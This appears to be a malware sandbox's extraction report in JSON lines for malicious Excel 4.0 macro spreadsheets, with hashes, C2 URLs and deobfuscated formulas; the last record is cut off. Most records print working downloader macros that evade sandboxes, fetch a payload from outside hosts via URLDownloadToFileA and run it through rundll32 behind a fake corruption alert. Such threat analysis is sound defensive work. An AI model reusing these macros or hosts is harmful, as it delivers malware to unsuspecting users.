{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e55254b5ab7d3718cbf5dc7e9d192018ff00ebc057c9bd5726eb68d09ab376d"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e55254b5ab7d3718cbf5dc7e9d192018ff00ebc057c9bd5726eb68d09ab376d","filesize":116224,"md5":"befe6d3ce6160e4183ed114d57357bba","sha1":"d48911e2ece7050fb096f1048aacbb1900d341e8","sha256":"0e55254b5ab7d3718cbf5dc7e9d192018ff00ebc057c9bd5726eb68d09ab376d","sha512":"d8a83fa89b5d8ef91a0c64dc0d4862335c8f1d2f09da466a8a202a024b92ba058cbe5404236bfa3c6e6a4533696eefa27e4a909a38a9aa28420fa35ae1a0da61","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e55254b5ab7d3718cbf5dc7e9d192018ff00ebc057c9bd5726eb68d09ab376d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"apZk9j8cq0\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e66d2df870c6f1b0ca79e51937fb9feb339e1dc865d14aeee0693442bfd6c6c"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e66d2df870c6f1b0ca79e51937fb9feb339e1dc865d14aeee0693442bfd6c6c","filesize":209920,"md5":"3c79fd1b09af4989c8f60c164325c707","sha1":"f43f1715e6b1f1f5befc59cd1e74166a32f40a1e","sha256":"0e66d2df870c6f1b0ca79e51937fb9feb339e1dc865d14aeee0693442bfd6c6c","sha512":"4f597de948ed7fa7ce59070a2b23dbb2b5dd3a2e4e267c617380f8b753e12d7586e279842bb94b75b59813cb4fe712428475311bd0ce65087dbafc11f31b35e3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e66d2df870c6f1b0ca79e51937fb9feb339e1dc865d14aeee0693442bfd6c6c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bVjuTR7tgH\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e693b9796698ba3005ba24a3028354cf70a95fc7d34eb6745f04255e811b50c"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e693b9796698ba3005ba24a3028354cf70a95fc7d34eb6745f04255e811b50c","filesize":209920,"md5":"de7bf976f1fdc2a3c24e46f217711972","sha1":"92ff1a8215d7c7d6cfcd9795cbef596dc6ecd153","sha256":"0e693b9796698ba3005ba24a3028354cf70a95fc7d34eb6745f04255e811b50c","sha512":"565609a8b9c6ec8f47cd6ab57750f3bb6f6bdd63c18d0f1945a146f18485dba8a535c71ff250840e66d9f9441fc67ea1fa96ebd78e17d14179d0db309e202d99","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e693b9796698ba3005ba24a3028354cf70a95fc7d34eb6745f04255e811b50c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"B49YHBxYYc\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e6a4b49a500166adbf705048d48a7cbf387a74bcdce1c16d84082204242c7fb"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e6a4b49a500166adbf705048d48a7cbf387a74bcdce1c16d84082204242c7fb","filesize":212992,"md5":"72e651e7a8c2d91ec11821896d71a31f","sha1":"a6448c3ebf52b4bb8d8a36ad19a8a7bb13dae789","sha256":"0e6a4b49a500166adbf705048d48a7cbf387a74bcdce1c16d84082204242c7fb","sha512":"43d7dc8fdebda27003985e1cabefacc62e86e61630fbcb25dccf0c2fa42c038493f219dfcac9ffec3f8186100173e383c455ceb666ab8ab8319c99ac9778472f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e6a4b49a500166adbf705048d48a7cbf387a74bcdce1c16d84082204242c7fb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"k0nDyCvoly\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e784e16115705c3378d8492f16132d05adcc3b4ce3629d0692d071e7e1bac3a"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e784e16115705c3378d8492f16132d05adcc3b4ce3629d0692d071e7e1bac3a","filesize":167936,"md5":"bc3228a5e0f9a43379a1d52262000ec5","sha1":"e15e62f10e3e17c43d7e15a5593aa2f504851c74","sha256":"0e784e16115705c3378d8492f16132d05adcc3b4ce3629d0692d071e7e1bac3a","sha512":"80f66533fbaded35ebb7b231695720b454223accaa15614938b1bd53cc59ee7e8a1dfda5fd4a52662013db1a1d528df755cb4cb651877046a4235f6fecdd2f17","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e784e16115705c3378d8492f16132d05adcc3b4ce3629d0692d071e7e1bac3a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JXHGpfsrtP\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e9937551f4e32a5c4ccecfc8f0d173e04b365d7c5f91f5586c720fcde61923a"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e9937551f4e32a5c4ccecfc8f0d173e04b365d7c5f91f5586c720fcde61923a","filesize":185344,"md5":"950a0ab71d70e942c6c7079b4e61b0ab","sha1":"3a1712735d9c6d852fc3f3736df0f48853a6f1f2","sha256":"0e9937551f4e32a5c4ccecfc8f0d173e04b365d7c5f91f5586c720fcde61923a","sha512":"b9c20c8f16c07d73e9a6b3987521f4e49134865683ae69845f26ae385d6774b5776415ca09bad3fab0174d152a843000fedb908f5385bc415e85105ab967c096","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e9937551f4e32a5c4ccecfc8f0d173e04b365d7c5f91f5586c720fcde61923a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0e9ec7a974b87f4c16c842e648dd212f80349eecb4e636087770bc1748206c3b"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0e9ec7a974b87f4c16c842e648dd212f80349eecb4e636087770bc1748206c3b","filesize":207360,"md5":"d1564f6b9a5e0a96d33b26d74c4152d4","sha1":"ebd56fc88dd26e573f3558e942297d84c2f3ed75","sha256":"0e9ec7a974b87f4c16c842e648dd212f80349eecb4e636087770bc1748206c3b","sha512":"e425c174f87aaba9ec1e0b26619b653519a0fa505feb26e0555975f04707ca9ca1a6958bc1faf6659983782ef63ed44378d02123cf1c6e644cb69fedd2151f74","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0e9ec7a974b87f4c16c842e648dd212f80349eecb4e636087770bc1748206c3b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iRkMZY7iUa\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0ea20ae35abef1171a437ba66c99cebe7272f62276ad491172e684eb24435005"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0ea20ae35abef1171a437ba66c99cebe7272f62276ad491172e684eb24435005","filesize":185344,"md5":"4a0c8f36221964744d24baa38eda4ded","sha1":"b162beee2be1010f5fead8beebcec17865368621","sha256":"0ea20ae35abef1171a437ba66c99cebe7272f62276ad491172e684eb24435005","sha512":"ac92fd9f224285ef2fdb8ad813c1e900ff8633ed2227d7896b1f9c050a5c01ee9d1cd619c325c696afd011ab3d08a957099105b468963f06b57824e228b5a0d9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0ea20ae35abef1171a437ba66c99cebe7272f62276ad491172e684eb24435005.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0eab76c1ea0196aee7dfd0a18b587bce2a3d137e8e703c39b49d3cf78f51b5f2"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0eab76c1ea0196aee7dfd0a18b587bce2a3d137e8e703c39b49d3cf78f51b5f2","filesize":116224,"md5":"10aca56ced67a93b83539b5dcffd1243","sha1":"cfc69080034b1e2e87916f52f32fa6deaf13e20c","sha256":"0eab76c1ea0196aee7dfd0a18b587bce2a3d137e8e703c39b49d3cf78f51b5f2","sha512":"40370159eb29ce019b10bf6fa537f16e8346641a15d10eb1af34d1d8935a4d370b1078dcd55889443734636d5f7934151ffad29323ab3cba880feb0c61c756d3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0eab76c1ea0196aee7dfd0a18b587bce2a3d137e8e703c39b49d3cf78f51b5f2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"a33UfxCXxW\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0eb54fbc4d2efa4ed91c22ec4142a01cebb876c27f23a97aef9df39f9cf72039"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0eb54fbc4d2efa4ed91c22ec4142a01cebb876c27f23a97aef9df39f9cf72039","filesize":116224,"md5":"017ffa217308165e63762b4d79a0697e","sha1":"92df76245b8c16c6dea73248965994b4a7f452af","sha256":"0eb54fbc4d2efa4ed91c22ec4142a01cebb876c27f23a97aef9df39f9cf72039","sha512":"1dbeabac8cd73f78871a5e2f3325c9e27fb3950c3321911e2134256f0f6422bd884deb4d46a50c552d035d3f44bfa73980db437fed64b6a6586201bbad905571","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0eb54fbc4d2efa4ed91c22ec4142a01cebb876c27f23a97aef9df39f9cf72039.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GSSo1t6NB3\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0eb80c99f2557bac0709ecf534c02c2f72f8c6cd0db35436c679630b52e7c904"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0eb80c99f2557bac0709ecf534c02c2f72f8c6cd0db35436c679630b52e7c904","filesize":185344,"md5":"ae42c2522bd8750fab622e99b6c70940","sha1":"69eeb4a422fec9fb20372aa0525ca5fa654a11ff","sha256":"0eb80c99f2557bac0709ecf534c02c2f72f8c6cd0db35436c679630b52e7c904","sha512":"d72fd4b3b36ffd220fec372d5624a3b699863180822f6c08acb67941def9e87496f6ac6599fb5976ae0ee28192103d0d30aa548f23f15bcdf95e98a585168af1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0eb80c99f2557bac0709ecf534c02c2f72f8c6cd0db35436c679630b52e7c904.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0ec08406c60293f12f3d6c451b3dabfc245af3a3d3d0cc244306ffda78ae2dde"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0ec08406c60293f12f3d6c451b3dabfc245af3a3d3d0cc244306ffda78ae2dde","filesize":145920,"md5":"16a5b65eae068c9d3848d07dcc290a3c","sha1":"72138ed785e5e1be2fc5c43db019936242f79df0","sha256":"0ec08406c60293f12f3d6c451b3dabfc245af3a3d3d0cc244306ffda78ae2dde","sha512":"6e4a4a0327ea6ca322e53c759275756b79d02356783589a26135b8613786dea02f1948dbb0c7042b109a1062a8d690728045ad7722dec500b62c6ca52b1301f9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0ec08406c60293f12f3d6c451b3dabfc245af3a3d3d0cc244306ffda78ae2dde.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"toMv8khmr4\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0ec4ed87ddd4cc65157dfda12549c94bbae4afba7a99d1c3649acac20e723e09"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0ec4ed87ddd4cc65157dfda12549c94bbae4afba7a99d1c3649acac20e723e09","filesize":144384,"md5":"09d61ec1a0e75f5785da8cc143b8246d","sha1":"260fb9bf53dd15f9ae6374a4b4ccc50aceb27630","sha256":"0ec4ed87ddd4cc65157dfda12549c94bbae4afba7a99d1c3649acac20e723e09","sha512":"af77dfcbff44bc8fdd64329d7bf02aeb9608a76f3354931ef32c28e615e63cbae3d231881449ca5e6b1ba2b2a2b450e2527f97a9682bc89f028cf1c2de6fd3e8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0ec4ed87ddd4cc65157dfda12549c94bbae4afba7a99d1c3649acac20e723e09.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Ug0HITmJQb\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0ec9f471ed68c37ee4a93ef841fa97e4a815818e664fd97c899c958fd7dc1229"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0ec9f471ed68c37ee4a93ef841fa97e4a815818e664fd97c899c958fd7dc1229","filesize":112128,"md5":"7e6925325cc35b5483cdca0ff223c114","sha1":"f18f72b7100143dbe18407462926f966134508ca","sha256":"0ec9f471ed68c37ee4a93ef841fa97e4a815818e664fd97c899c958fd7dc1229","sha512":"325a5e7e9ec4573698408ca7054c4a9e1c1d0738aec4ec1f3f6ea164c87db8b5d09683eef92c9561df5811d0141caf901381fc066efadcabccb410adaf27ff22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0ec9f471ed68c37ee4a93ef841fa97e4a815818e664fd97c899c958fd7dc1229.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0ed7846d9908dff428d18eb69c519b9aef0a33c970b69a9e7f00d9775fc543b0"},"analysis":{"reported":"2020-04-09T16:14:54Z","score":10},"files":[{"filename":"0ed7846d9908dff428d18eb69c519b9aef0a33c970b69a9e7f00d9775fc543b0","filesize":206336,"md5":"6401ca0b0901d634b7d8f35f59b635e3","sha1":"23857c15574e22fc83435836793918169d431f61","sha256":"0ed7846d9908dff428d18eb69c519b9aef0a33c970b69a9e7f00d9775fc543b0","sha512":"58ac16d65c20ee059d5ef137f176a4ad3d106ca2ded196c4b4b40481ff1d132ad09df694e1cfb41990996b91a37e5e6ebb689cce95f233049c0f18a73f3d82f9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0ed7846d9908dff428d18eb69c519b9aef0a33c970b69a9e7f00d9775fc543b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 